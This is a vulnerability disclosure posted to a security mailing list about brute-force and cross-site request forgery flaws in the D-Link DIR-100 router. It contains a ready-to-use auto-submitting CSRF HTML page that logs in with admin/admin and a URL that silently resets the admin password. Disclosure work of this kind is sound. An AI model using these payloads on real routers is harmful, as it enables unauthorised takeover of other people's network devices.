D-Link DIR-100 Brute Force / Cross Site Request Forgery

`Hello list!  
  
There are Brute Force and Cross-Site Request Forgery vulnerabilities in   
D-Link DIR-100.  
  
-------------------------  
Affected products:  
-------------------------  
  
Vulnerable is the next model: D-Link DIR-100, Firmware v1.01. All other   
versions also must be vulnerable.  
  
----------  
Details:  
----------  
  
Brute Force (WASC-11):  
  
http://site/public/login.htm  
  
No protection from BF attacks in login form.  
  
Cross-Site Request Forgery (WASC-09):  
  
Lack of protection against Brute Force (such as captcha) also leads to   
possibility of conducting of CSRF attacks, which I wrote about in the   
article Attacks on unprotected login forms   
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2011-April/007773.html).   
It allows to conduct remote login. Which will be in handy at conducting of   
attacks on different CSRF and XSS vulnerabilities in control panel.  
  
D-Link DIR-100 CSRF.html  
  
<html>  
<head>  
<title>D-Link DIR-100 CSRF exploit (C) 2017 MustLive.   
http://websecurity.com.ua</title>  
</head>  
<body onLoad="document.hack.submit()">  
<form name="hack" action="http://site/postlogin.xgi" method="post">  
<input type="hidden" name="authen_username" value="admin">  
<input type="hidden" name="authen_password" value="admin">  
</form>  
</body>  
</html>  
  
Cross-Site Request Forgery (WASC-09):  
  
Change admin's password:  
  
http://site/Tools/tools_admin.xgi?SET/sys/account/superUserName=admin&SET/sys/account/superUserPassword=admin  
  
------------  
Timeline:  
------------  
  
2015.05.02 - announced at my site about vulnerabilities in DIR-100.  
2015-2017 - informed developers about multiple vulnerabilities in this and   
other D-Link devices.  
2017.02.04 - disclosed at my site (http://websecurity.com.ua/7745/).  
  
Best wishes & regards,  
MustLive  
Administrator of Websecurity web site  
http://websecurity.com.ua   
`